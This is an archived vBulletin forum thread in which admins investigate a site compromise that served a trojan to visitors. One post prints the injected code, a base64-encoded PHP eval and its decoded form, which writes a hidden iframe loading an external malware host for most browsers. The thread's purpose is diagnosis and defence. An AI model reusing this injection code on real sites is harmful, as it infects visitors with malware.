The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
new 0 day exploit? (bekebu.in / cuzelu.in)
I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in &/or cuzelu.in
http://support.clean-mx.de/clean-mx/...n&submit=query not sure if this was a new 0 day going around or not, but it may be worth someones time to look into this. --------------- Added [DATE]1277395487[/DATE] at [TIME]1277395487[/TIME] --------------- I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore. 91.188.0.0/16 http://www.db.ripe.net/whois?form_ty...&submit=Search http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55 http://www.senderbase.org/senderbase...g=91.188.59.55 |
#2
|
|||
|
|||
What file is calling that site?
|
#3
|
|||
|
|||
I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.
Code:
\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\")); Code:
if (!isset($_COOKIE['xlov'])) { $xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center'); $ifrand = mt_rand(0,111); $domb = "http: // www. fealatoc.co .cc/clo.php"; foreach ($xb as $xbb) { if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) { echo <<<HJJ <script> function SetCookie(cookieName,cookieContent){ var cookiePath = '/'; var expDate=new Date(); expDate.setTime(expDate.getTime()+372800000) ; var expires=expDate.toGMTString(); document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; } SetCookie("xlov", "day"); </script> <iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe> HJJ; break; } } } the url in the script code is broken on purpose --------------- Added [DATE]1277566152[/DATE] at [TIME]1277566152[/TIME] --------------- Thanks to the people over at Tapatalk for helping me figure this out. :wink: |
#4
|
||||
|
||||
you're running Tapatalk on your vB? or is it just a clean install of vB?
|
#5
|
|||
|
|||
We have been using tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in &/or cuzelu.in. A few days ago, one the admins @ tapatalk contacted us to let us know they had shut us down on their side due to the virii issue and have helped us locate some of this code.
--------------- Added [DATE]1277640262[/DATE] at [TIME]1277640262[/TIME] --------------- fealatoc . co . cc info: http://www.db.ripe.net/whois?form_ty...&submit=Search http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7 |
#6
|
|||
|
|||
Post Thanks 'Hack' got hacked.
|
#7
|
|||
|
|||
Also Reported to PT author @ https://vborg.vbsupport.ru/showpost....&postcount=948
|
#8
|
||||
|
||||
I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.
|
#9
|
|||
|
|||
Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.
|
#10
|
||||
|
||||
I am not sure either, the information are mixed, some forum didn't install Tapatalk also got hacked. But one forum found a mysterious php file are added to the Tapatalk directory that caught our attention. So we went ahead to check our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).
We have sent out email to all forum owners to upgrade so I hope to keep this infection to the minimum. |
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|